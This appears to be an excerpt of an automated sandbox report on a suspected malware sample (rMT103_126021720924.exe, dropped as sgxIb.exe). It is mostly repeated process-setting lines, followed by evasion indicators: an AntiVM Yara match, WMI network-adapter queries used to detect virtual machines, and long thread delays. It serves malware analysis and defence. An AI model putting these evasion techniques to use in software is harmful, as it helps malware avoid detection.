                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7248, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: A7D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: B7D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: BC10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: CC10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: DC10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: 4B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: BC90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: CC90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: DC90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 49A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: AFD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: D610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: DC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 27E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 47E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599885Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599514Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599382Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599208Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599092Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597624Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597515Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597406Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597296Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597187Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596878Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596764Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596655Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595982Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595873Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594765Jump to behavior
